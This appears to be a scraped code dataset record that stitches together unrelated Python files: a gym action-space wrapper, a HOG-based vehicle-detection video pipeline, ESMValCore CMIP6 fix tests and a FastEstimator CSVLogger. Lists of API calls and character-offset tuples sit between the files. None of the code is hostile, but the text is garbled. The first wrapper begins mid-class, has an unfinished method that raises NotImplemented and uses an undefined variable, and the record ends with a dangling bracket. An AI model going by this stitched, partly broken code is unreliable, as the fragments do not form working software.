# Get the discrete parameter value
parameter = action[0]
# The args should be a valid MultiDiscrete sample for the given parameter. Note
# MultiDiscrete samples are ndarrays of dtype np.int64.
args = action[1:]
assert self.disjoint_action_spaces[parameter].contains(np.array(args, dtype=np.int64))
# TODO the args need to be converted back into their original nested form
#
output_space = self.env.action_space.disjoint_spaces[parameter]
raise NotImplemented
assert self.env.action_space.contains(transformed_action)
return tuple(transformed_action)
class MultiDiscreteActionSpaceWrapper(ActionWrapper):
"""Expose a single MultiDiscrete action space instead of a DiscreteParametric action space.
"""
def __init__(self, env):
assert isinstance(env.action_space, DiscreteParametric), ("expected DiscreteParametric action space, got {}".format(type(env.action_space)))
super(MultiDiscreteActionSpaceWrapper, self).__init__(env)
parametric_space: DiscreteParametric = env.action_space
# Construct a space from the parametric space's parameter_space and disjoint spaces
self.action_space = merge_discrete_spaces([parametric_space.parameter_space] + list(parametric_space.disjoint_spaces))
def action(self, action):
"""Convert a MultiDiscrete action into a DiscreteParametric action."""
# Get the discrete parameter value
parameter = np.argmax(action[0])
argument_space = self.env.action_space[parameter]
# Convert the appropriate args for the disjoint space using the parameter
start_index = 1 + len(_discrete_dims(self.env.action_space.disjoint_spaces[:parameter]))
end_index = 1 + len(_discrete_dims(self.env.action_space.disjoint_spaces[:parameter + 1]))
# Our discrete arguments for the disjoint space
args = action[start_index:end_index]
disjoint_args = _discrete_unflatten(argument_space, args)
# Make the final flat tuple
transformed_action = [parameter]
if isinstance(disjoint_args, (tuple, list)):
transformed_action.extend(disjoint_args)
else:
transformed_action.append(disjoint_args)
assert self.env.action_space.contains(transformed_action)
return tuple(transformed_action)
class BoxActionSpaceWrapper(ActionWrapper):
"""Expose a flat Box action space instead of a parametric action space.
Example::
>>> isinstance(BoxActionSpaceWrapper(env).action_space, Box)
True
Note that sampling from a Box is not the same as flattening samples from a richer
subspace. To draw action space samples from a `SimpleActionSpace` call
`SimpleActionSpace.action_space_sample()`
"""
def __init__(self, env):
assert isinstance(env.action_space, DiscreteParametric), ("expected DiscreteParametric action space, got {}".format(type(env.action_space)))
super(BoxActionSpaceWrapper, self).__init__(env)
parametric_space: DiscreteParametric = env.action_space
# Construct a space from the parametric space's parameter_space and disjoint spaces
self.action_space = flatten_space(spaces.Tuple([parametric_space.parameter_space] +
list(parametric_space.disjoint_spaces)))
self.disjoint_sizes = [flatdim(space) for space in parametric_space.disjoint_spaces]
def action(self, action):
"""Convert a flattened action into a parametric space."""
# Get the discrete parameter value
num_disjoint_spaces = len(self.env.action_space)
parameter = np.argmax(action[:num_disjoint_spaces])
argument_space = self.env.action_space[parameter]
# Now we need to index the appropriate args for the disjoint space using the parameter
start_index = num_disjoint_spaces
start_index += sum(self.disjoint_sizes[:parameter])
end_index = start_index + self.disjoint_sizes[parameter]
# Flattened arguments for the disjoint space
args = action[start_index:end_index]
try:
disjoint_args = unflatten(argument_space, args)
except IndexError as e:
# Very likely the args are invalid for the wrapped space e.g. a Discrete(2) getting all zeros.
msg = "Failed to unflatten arguments to wrapped space of " + str(argument_space)
raise ValueError(msg) from e
# Make the final flat tuple
transformed_action = [parameter]
if isinstance(disjoint_args, tuple):
transformed_action.extend(disjoint_args)
else:
transformed_action.append(disjoint_args)
assert self.env.action_space.contains(transformed_action)
return tuple(transformed_action)
def reverse_action(self, action):
"""Convert a wrapped action (e.g. from a DiscreteParametric) into a flattened action"""
parameter = action[0]
result = np.zeros(self.action_space.shape[0], dtype=self.action_space.dtype)
result[parameter] = 1.0
start_index = len(self.env.action_space)
start_index += sum(self.disjoint_sizes[:parameter])
end_index = start_index + self.disjoint_sizes[parameter]
result[start_index:end_index] = flatten(self.env.action_space[parameter], action[1:])
assert self.action_space.contains(result)
return result
def action_space_sample(self):
rich_sample = self.env.action_space.sample()
assert self.env.action_space.contains(rich_sample)
return self.reverse_action(rich_sample)
|
[
"gym.spaces.flatten",
"numpy.argmax",
"numpy.zeros",
"sorting_gym.DiscreteParametric",
"gym.spaces.flatdim",
"numpy.array",
"gym.spaces.unflatten"
] |
[((3029, 3117), 'sorting_gym.DiscreteParametric', 'DiscreteParametric', (['env.action_space.parameter_space.n', 'self.disjoint_action_spaces'], {}), '(env.action_space.parameter_space.n, self.\n disjoint_action_spaces)\n', (3047, 3117), False, 'from sorting_gym import DiscreteParametric\n'), ((4889, 4909), 'numpy.argmax', 'np.argmax', (['action[0]'], {}), '(action[0])\n', (4898, 4909), True, 'import numpy as np\n'), ((7103, 7142), 'numpy.argmax', 'np.argmax', (['action[:num_disjoint_spaces]'], {}), '(action[:num_disjoint_spaces])\n', (7112, 7142), True, 'import numpy as np\n'), ((8443, 8510), 'numpy.zeros', 'np.zeros', (['self.action_space.shape[0]'], {'dtype': 'self.action_space.dtype'}), '(self.action_space.shape[0], dtype=self.action_space.dtype)\n', (8451, 8510), True, 'import numpy as np\n'), ((8757, 8810), 'gym.spaces.flatten', 'flatten', (['self.env.action_space[parameter]', 'action[1:]'], {}), '(self.env.action_space[parameter], action[1:])\n', (8764, 8810), False, 'from gym.spaces import flatten_space, flatdim, unflatten, flatten\n'), ((3689, 3719), 'numpy.array', 'np.array', (['args'], {'dtype': 'np.int64'}), '(args, dtype=np.int64)\n', (3697, 3719), True, 'import numpy as np\n'), ((6824, 6838), 'gym.spaces.flatdim', 'flatdim', (['space'], {}), '(space)\n', (6831, 6838), False, 'from gym.spaces import flatten_space, flatdim, unflatten, flatten\n'), ((7605, 7636), 'gym.spaces.unflatten', 'unflatten', (['argument_space', 'args'], {}), '(argument_space, args)\n', (7614, 7636), False, 'from gym.spaces import flatten_space, flatdim, unflatten, flatten\n')]
|
# import multiply_detections
from hog_window_search import find_cars
from heat import apply_heat
import pickle
import cv2
import glob
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.image as mpimg
dist_pickle = pickle.load(open("output/svc_model.p", "rb"))
# get attributes of our svc object
svc = dist_pickle["svc"]
X_scaler = dist_pickle["scaler"]
orient = dist_pickle["orient"]
pix_per_cell = dist_pickle["pix_per_cell"]
cell_per_block = dist_pickle["cell_per_block"]
colorspace = dist_pickle["colorspace"]
hog_channel = dist_pickle["hog_channel"]
# spatial_size = (32, 32)
# hist_bins = 32
def pipeline(img):
# ystart = 400
# ystop = 656
#
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
bbox_list = []
# out_img, boxes1 = find_cars(img, ystart, ystop, 1,
# svc, X_scaler, orient, pix_per_cell,
# cell_per_block, colorspace)
# out_img, boxes2 = find_cars(img, ystart, ystop, 2,
# svc, X_scaler, orient, pix_per_cell,
# cell_per_block, colorspace)
#
# out_img, boxes4 = find_cars(img, ystart, ystop, 4,
# svc, X_scaler, orient, pix_per_cell,
# cell_per_block, colorspace)
# out_img, boxes4 = find_cars(img, ystart, ystop, 4,
# svc, X_scaler, orient, pix_per_cell,
# cell_per_block, colorspace)
# for bbox in box_list:
# cv2.rectangle(out_img, bbox[0],
# bbox[1], (0, 0, 255), 6)
# new way:
rectangles = []
ystart = 400
ystop = 464
scale = 1.0
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 416
ystop = 480
scale = 1.0
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 400
ystop = 496
scale = 1.5
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 432
ystop = 528
scale = 1.5
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 400
ystop = 528
scale = 2.0
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 432
ystop = 560
scale = 2.0
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 400
ystop = 596
scale = 3.5
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
ystart = 464
ystop = 660
scale = 3.5
rectangles.append(find_cars(img, ystart, ystop, scale,
svc, X_scaler, orient, pix_per_cell,
cell_per_block, colorspace))
# apparently this is the best way to flatten a list of lists
rectangles = [item for sublist in rectangles for item in sublist]
#Plot rectangles on image
for bbox in rectangles:
cv2.rectangle(img, bbox[0],
bbox[1], (0, 255, 0), 4)
out_img, heatmap, labels = apply_heat(img, rectangles)
return out_img, heatmap, labels
video_path = "project_video.mp4"
# Define the codec and create VideoWriter object
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('output/output2.avi', fourcc, 25.0, (1280, 720), isColor=True)
cap = cv2.VideoCapture(video_path)
cnt = 0
while cap.isOpened():
# for i in range(50):
ret, frame = cap.read()
if ret is True:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = frame.astype(np.float32) / 255
result, heat, labels = pipeline(frame)
# result = cv2.cvtColor(frame, cv2.COLOR_LUV2RGB)
result2 = cv2.cvtColor((result * 255).astype(np.uint8), cv2.COLOR_BGR2RGB)
out.write(result2)
cnt += 1
print(cnt)
else:
break
#
# files = glob.glob("f:/work/sdc/project4/CarND-Vehicle-Detection/output/vlc/*.png")
#
# for file in files:
# img = cv2.imread(file)
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# img = img.astype(np.float32) / 255
# result, heat, labels = pipeline(img)
#
# fig = plt.figure()
# plt.subplot(121)
# plt.imshow(result)
# plt.title('Car Positions')
# plt.subplot(122)
# plt.imshow(heat, cmap='hot')
# plt.title('Heat Map')
# fig.tight_layout()
#
# # plt.imshow(labels[0], cmap='gray')
# # plt.title('Labels')
# # fig.tight_layout()
|
[
"cv2.VideoWriter",
"cv2.VideoWriter_fourcc",
"cv2.cvtColor",
"heat.apply_heat",
"cv2.VideoCapture",
"cv2.rectangle",
"hog_window_search.find_cars"
] |
[((4090, 4121), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (["*'XVID'"], {}), "(*'XVID')\n", (4112, 4121), False, 'import cv2\n'), ((4128, 4206), 'cv2.VideoWriter', 'cv2.VideoWriter', (['"""output/output2.avi"""', 'fourcc', '(25.0)', '(1280, 720)'], {'isColor': '(True)'}), "('output/output2.avi', fourcc, 25.0, (1280, 720), isColor=True)\n", (4143, 4206), False, 'import cv2\n'), ((4214, 4242), 'cv2.VideoCapture', 'cv2.VideoCapture', (['video_path'], {}), '(video_path)\n', (4230, 4242), False, 'import cv2\n'), ((3932, 3959), 'heat.apply_heat', 'apply_heat', (['img', 'rectangles'], {}), '(img, rectangles)\n', (3942, 3959), False, 'from heat import apply_heat\n'), ((1757, 1862), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (1766, 1862), False, 'from hog_window_search import find_cars\n'), ((1999, 2104), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (2008, 2104), False, 'from hog_window_search import find_cars\n'), ((2241, 2346), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (2250, 2346), False, 'from hog_window_search import find_cars\n'), ((2483, 2588), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (2492, 2588), False, 'from hog_window_search import find_cars\n'), ((2725, 2830), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (2734, 2830), False, 'from hog_window_search import find_cars\n'), ((2967, 3072), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (2976, 3072), False, 'from hog_window_search import find_cars\n'), ((3209, 3314), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (3218, 3314), False, 'from hog_window_search import find_cars\n'), ((3451, 3556), 'hog_window_search.find_cars', 'find_cars', (['img', 'ystart', 'ystop', 'scale', 'svc', 'X_scaler', 'orient', 'pix_per_cell', 'cell_per_block', 'colorspace'], {}), '(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell,\n cell_per_block, colorspace)\n', (3460, 3556), False, 'from hog_window_search import find_cars\n'), ((3825, 3877), 'cv2.rectangle', 'cv2.rectangle', (['img', 'bbox[0]', 'bbox[1]', '(0, 255, 0)', '(4)'], {}), '(img, bbox[0], bbox[1], (0, 255, 0), 4)\n', (3838, 3877), False, 'import cv2\n'), ((4359, 4397), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2RGB'], {}), '(frame, cv2.COLOR_BGR2RGB)\n', (4371, 4397), False, 'import cv2\n')]
|
import click
from arrow.commands.remote.add_organism import cli as add_organism
from arrow.commands.remote.add_track import cli as add_track
from arrow.commands.remote.delete_organism import cli as delete_organism
from arrow.commands.remote.delete_track import cli as delete_track
from arrow.commands.remote.update_organism import cli as update_organism
from arrow.commands.remote.update_track import cli as update_track
@click.group()
def cli():
pass
cli.add_command(add_organism)
cli.add_command(add_track)
cli.add_command(delete_organism)
cli.add_command(delete_track)
cli.add_command(update_organism)
cli.add_command(update_track)
|
[
"click.group"
] |
[((424, 437), 'click.group', 'click.group', ([], {}), '()\n', (435, 437), False, 'import click\n')]
|
"""Tests for the fixes of ACCESS-ESM1-5."""
import unittest.mock
import iris
import numpy as np
import pytest
from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg
from esmvalcore.cmor._fixes.common import ClFixHybridHeightCoord
from esmvalcore.cmor.fix import Fix
from esmvalcore.cmor.table import get_var_info
B_POINTS = [
0.99771648645401, 0.990881502628326, 0.979542553424835,
0.9637770652771, 0.943695485591888, 0.919438362121582,
0.891178011894226, 0.859118342399597, 0.823493480682373,
0.784570515155792, 0.742646217346191, 0.698050200939178,
0.651142716407776, 0.602314412593842, 0.55198872089386,
0.500619947910309, 0.44869339466095, 0.39672577381134,
0.34526526927948, 0.294891387224197, 0.24621507525444,
0.199878215789795, 0.156554222106934, 0.116947874426842,
0.0817952379584312, 0.0518637150526047, 0.0279368180781603,
0.0107164792716503, 0.00130179093685001,
0, 0, 0, 0, 0, 0, 0, 0, 0,
]
B_BOUNDS = [
[1, 0.994296252727509],
[0.994296252727509, 0.985203862190247],
[0.985203862190247, 0.971644043922424],
[0.971644043922424, 0.953709840774536],
[0.953709840774536, 0.931527435779572],
[0.931527435779572, 0.905253052711487],
[0.905253052711487, 0.875074565410614],
[0.875074565410614, 0.84121161699295],
[0.84121161699295, 0.80391401052475],
[0.80391401052475, 0.763464510440826],
[0.763464510440826, 0.720175802707672],
[0.720175802707672, 0.674392521381378],
[0.674392521381378, 0.626490533351898],
[0.626490533351898, 0.576877355575562],
[0.576877355575562, 0.525990784168243],
[0.525990784168243, 0.474301367998123],
[0.474301367998123, 0.422309905290604],
[0.422309905290604, 0.370548874139786],
[0.370548874139786, 0.3195820748806],
[0.3195820748806, 0.270004868507385],
[0.270004868507385, 0.222443267703056],
[0.222443267703056, 0.177555426955223],
[0.177555426955223, 0.136030226945877],
[0.136030226945877, 0.0985881090164185],
[0.0985881090164185, 0.0659807845950127],
[0.0659807845950127, 0.0389823913574219],
[0.0389823913574219, 0.0183146875351667],
[0.0183146875351667, 0.00487210927531123],
[0.00487210927531123, 0],
[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0],
[0, 0], [0, 0],
]
@pytest.fixture
def cl_cubes():
"""``cl`` cubes."""
b_coord = iris.coords.AuxCoord(np.zeros_like(B_POINTS),
bounds=np.zeros_like(B_BOUNDS),
var_name='b')
cube = iris.cube.Cube(
np.ones_like(B_POINTS),
var_name='cl',
standard_name='cloud_area_fraction_in_atmosphere_layer',
units='%',
aux_coords_and_dims=[(b_coord, 0)],
)
return iris.cube.CubeList([cube])
def test_get_cl_fix():
"""Test getting of fix."""
fix = Fix.get_fixes('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'cl')
assert fix == [Cl(None)]
@unittest.mock.patch(
'esmvalcore.cmor._fixes.cmip6.access_esm1_5.ClFixHybridHeightCoord.'
'fix_metadata', autospec=True)
def test_cl_fix_metadata(mock_base_fix_metadata, cl_cubes):
"""Test ``fix_metadata`` for ``cl``."""
mock_base_fix_metadata.side_effect = lambda x, y: y
fix = Cl(None)
out_cube = fix.fix_metadata(cl_cubes)[0]
b_coord = out_cube.coord(var_name='b')
np.testing.assert_allclose(b_coord.points, B_POINTS)
np.testing.assert_allclose(b_coord.bounds, B_BOUNDS)
def test_cl_fix():
"""Test fix for ``cl``."""
assert issubclass(Cl, ClFixHybridHeightCoord)
def test_get_cli_fix():
"""Test getting of fix."""
fix = Fix.get_fixes('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'cli')
assert fix == [Cli(None)]
def test_cli_fix():
"""Test fix for ``cli``."""
assert Cli is Cl
def test_get_clw_fix():
"""Test getting of fix."""
fix = Fix.get_fixes('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'clw')
assert fix == [Clw(None)]
def test_clw_fix():
"""Test fix for ``clw``."""
assert Clw is Cl
@pytest.fixture
def cubes_with_wrong_air_pressure():
"""Cubes with wrong ``air_pressure`` coordinate."""
air_pressure_coord = iris.coords.DimCoord(
[1000.09, 600.6, 200.0],
bounds=[[1200.00001, 800], [800, 400.8], [400.8, 1.9]],
var_name='plev',
standard_name='air_pressure',
units='pa',
)
hus_cube = iris.cube.Cube(
[0.0, 1.0, 2.0],
var_name='hus',
dim_coords_and_dims=[(air_pressure_coord, 0)],
)
zg_cube = hus_cube.copy()
zg_cube.var_name = 'zg'
return iris.cube.CubeList([hus_cube, zg_cube])
def test_get_hus_fix():
"""Test getting of fix."""
fix = Fix.get_fixes('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'hus')
assert fix == [Hus(None)]
def test_hus_fix_metadata(cubes_with_wrong_air_pressure):
"""Test ``fix_metadata`` for ``hus``."""
vardef = get_var_info('CMIP6', 'Amon', 'hus')
fix = Hus(vardef)
out_cubes = fix.fix_metadata(cubes_with_wrong_air_pressure)
assert len(out_cubes) == 2
hus_cube = out_cubes.extract_cube('hus')
zg_cube = out_cubes.extract_cube('zg')
assert hus_cube.var_name == 'hus'
assert zg_cube.var_name == 'zg'
np.testing.assert_allclose(hus_cube.coord('air_pressure').points,
[1000.0, 601.0, 200.0])
np.testing.assert_allclose(hus_cube.coord('air_pressure').bounds,
[[1200.0, 800.0], [800.0, 401.0], [401.0, 2.0]])
np.testing.assert_allclose(zg_cube.coord('air_pressure').points,
[1000.09, 600.6, 200.0])
np.testing.assert_allclose(zg_cube.coord('air_pressure').bounds,
[[1200.00001, 800], [800, 400.8], [400.8, 1.9]])
def test_get_zg_fix():
"""Test getting of fix."""
fix = Fix.get_fixes('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'zg')
assert fix == [Zg(None)]
def test_zg_fix_metadata(cubes_with_wrong_air_pressure):
"""Test ``fix_metadata`` for ``zg``."""
vardef = get_var_info('CMIP6', 'Amon', 'zg')
fix = Zg(vardef)
out_cubes = fix.fix_metadata(cubes_with_wrong_air_pressure)
assert len(out_cubes) == 2
hus_cube = out_cubes.extract_cube('hus')
zg_cube = out_cubes.extract_cube('zg')
assert hus_cube.var_name == 'hus'
assert zg_cube.var_name == 'zg'
np.testing.assert_allclose(hus_cube.coord('air_pressure').points,
[1000.09, 600.6, 200.0])
np.testing.assert_allclose(hus_cube.coord('air_pressure').bounds,
[[1200.00001, 800], [800, 400.8], [400.8, 1.9]])
np.testing.assert_allclose(zg_cube.coord('air_pressure').points,
[1000.0, 601.0, 200.0])
np.testing.assert_allclose(zg_cube.coord('air_pressure').bounds,
[[1200.0, 800.0], [800.0, 401.0], [401.0, 2.0]])
|
[
"esmvalcore.cmor._fixes.cmip6.access_esm1_5.Zg",
"numpy.zeros_like",
"numpy.ones_like",
"esmvalcore.cmor._fixes.cmip6.access_esm1_5.Clw",
"iris.cube.CubeList",
"esmvalcore.cmor._fixes.cmip6.access_esm1_5.Cli",
"esmvalcore.cmor.fix.Fix.get_fixes",
"esmvalcore.cmor._fixes.cmip6.access_esm1_5.Hus",
"iris.coords.DimCoord",
"esmvalcore.cmor._fixes.cmip6.access_esm1_5.Cl",
"iris.cube.Cube",
"esmvalcore.cmor.table.get_var_info",
"numpy.testing.assert_allclose"
] |
[((2777, 2803), 'iris.cube.CubeList', 'iris.cube.CubeList', (['[cube]'], {}), '([cube])\n', (2795, 2803), False, 'import iris\n'), ((2870, 2923), 'esmvalcore.cmor.fix.Fix.get_fixes', 'Fix.get_fixes', (['"""CMIP6"""', '"""ACCESS-ESM1-5"""', '"""Amon"""', '"""cl"""'], {}), "('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'cl')\n", (2883, 2923), False, 'from esmvalcore.cmor.fix import Fix\n'), ((3255, 3263), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Cl', 'Cl', (['None'], {}), '(None)\n', (3257, 3263), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((3356, 3408), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['b_coord.points', 'B_POINTS'], {}), '(b_coord.points, B_POINTS)\n', (3382, 3408), True, 'import numpy as np\n'), ((3413, 3465), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['b_coord.bounds', 'B_BOUNDS'], {}), '(b_coord.bounds, B_BOUNDS)\n', (3439, 3465), True, 'import numpy as np\n'), ((3635, 3689), 'esmvalcore.cmor.fix.Fix.get_fixes', 'Fix.get_fixes', (['"""CMIP6"""', '"""ACCESS-ESM1-5"""', '"""Amon"""', '"""cli"""'], {}), "('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'cli')\n", (3648, 3689), False, 'from esmvalcore.cmor.fix import Fix\n'), ((3862, 3916), 'esmvalcore.cmor.fix.Fix.get_fixes', 'Fix.get_fixes', (['"""CMIP6"""', '"""ACCESS-ESM1-5"""', '"""Amon"""', '"""clw"""'], {}), "('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'clw')\n", (3875, 3916), False, 'from esmvalcore.cmor.fix import Fix\n'), ((4158, 4328), 'iris.coords.DimCoord', 'iris.coords.DimCoord', (['[1000.09, 600.6, 200.0]'], {'bounds': '[[1200.00001, 800], [800, 400.8], [400.8, 1.9]]', 'var_name': '"""plev"""', 'standard_name': '"""air_pressure"""', 'units': '"""pa"""'}), "([1000.09, 600.6, 200.0], bounds=[[1200.00001, 800], [\n 800, 400.8], [400.8, 1.9]], var_name='plev', standard_name=\n 'air_pressure', units='pa')\n", (4178, 4328), False, 'import iris\n'), ((4381, 4480), 'iris.cube.Cube', 'iris.cube.Cube', (['[0.0, 1.0, 2.0]'], {'var_name': '"""hus"""', 'dim_coords_and_dims': '[(air_pressure_coord, 0)]'}), "([0.0, 1.0, 2.0], var_name='hus', dim_coords_and_dims=[(\n air_pressure_coord, 0)])\n", (4395, 4480), False, 'import iris\n'), ((4576, 4615), 'iris.cube.CubeList', 'iris.cube.CubeList', (['[hus_cube, zg_cube]'], {}), '([hus_cube, zg_cube])\n', (4594, 4615), False, 'import iris\n'), ((4683, 4737), 'esmvalcore.cmor.fix.Fix.get_fixes', 'Fix.get_fixes', (['"""CMIP6"""', '"""ACCESS-ESM1-5"""', '"""Amon"""', '"""hus"""'], {}), "('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'hus')\n", (4696, 4737), False, 'from esmvalcore.cmor.fix import Fix\n'), ((4886, 4922), 'esmvalcore.cmor.table.get_var_info', 'get_var_info', (['"""CMIP6"""', '"""Amon"""', '"""hus"""'], {}), "('CMIP6', 'Amon', 'hus')\n", (4898, 4922), False, 'from esmvalcore.cmor.table import get_var_info\n'), ((4933, 4944), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Hus', 'Hus', (['vardef'], {}), '(vardef)\n', (4936, 4944), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((5817, 5870), 'esmvalcore.cmor.fix.Fix.get_fixes', 'Fix.get_fixes', (['"""CMIP6"""', '"""ACCESS-ESM1-5"""', '"""Amon"""', '"""zg"""'], {}), "('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'zg')\n", (5830, 5870), False, 'from esmvalcore.cmor.fix import Fix\n'), ((6016, 6051), 'esmvalcore.cmor.table.get_var_info', 'get_var_info', (['"""CMIP6"""', '"""Amon"""', '"""zg"""'], {}), "('CMIP6', 'Amon', 'zg')\n", (6028, 6051), False, 'from esmvalcore.cmor.table import get_var_info\n'), ((6062, 6072), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Zg', 'Zg', (['vardef'], {}), '(vardef)\n', (6064, 6072), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((2409, 2432), 'numpy.zeros_like', 'np.zeros_like', (['B_POINTS'], {}), '(B_POINTS)\n', (2422, 2432), True, 'import numpy as np\n'), ((2585, 2607), 'numpy.ones_like', 'np.ones_like', (['B_POINTS'], {}), '(B_POINTS)\n', (2597, 2607), True, 'import numpy as np\n'), ((2476, 2499), 'numpy.zeros_like', 'np.zeros_like', (['B_BOUNDS'], {}), '(B_BOUNDS)\n', (2489, 2499), True, 'import numpy as np\n'), ((2943, 2951), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Cl', 'Cl', (['None'], {}), '(None)\n', (2945, 2951), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((3709, 3718), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Cli', 'Cli', (['None'], {}), '(None)\n', (3712, 3718), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((3936, 3945), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Clw', 'Clw', (['None'], {}), '(None)\n', (3939, 3945), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((4757, 4766), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Hus', 'Hus', (['None'], {}), '(None)\n', (4760, 4766), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((5890, 5898), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Zg', 'Zg', (['None'], {}), '(None)\n', (5892, 5898), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n')]
|
# Copyright 2019 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
from collections import defaultdict
from typing import List, Optional, Union, Iterable
import pandas as pd
from fastestimator.trace.trace import Trace
from fastestimator.util.data import Data
from fastestimator.util.traceability_util import traceable
@traceable()
class CSVLogger(Trace):
"""Log monitored quantities in a CSV file.
Args:
filename: Output filename.
monitor_names: List of keys to monitor. If None then all metrics will be recorded.
mode: What mode(s) to execute this Trace in. For example, "train", "eval", "test", or "infer". To execute
regardless of mode, pass None. To execute in all modes except for a particular one, you can pass an argument
like "!infer" or "!train".
"""
def __init__(self,
filename: str,
monitor_names: Optional[Union[List[str], str]] = None,
mode: Union[None, str, Iterable[str]] = ("eval", "test")) -> None:
super().__init__(inputs="*" if monitor_names is None else monitor_names, mode=mode)
self.filename = filename
self.data = None
def on_begin(self, data: Data) -> None:
self.data = defaultdict(list)
def on_epoch_end(self, data: Data) -> None:
self.data["mode"].append(self.system.mode)
self.data["epoch"].append(self.system.epoch_idx)
if "*" in self.inputs:
for key, value in data.read_logs().items():
self.data[key].append(value)
else:
for key in self.inputs:
self.data[key].append(data[key])
def on_end(self, data: Data) -> None:
df = pd.DataFrame(data=self.data)
if os.path.exists(self.filename):
df.to_csv(self.filename, mode='a', index=False)
else:
df.to_csv(self.filename, index=False)
|
[
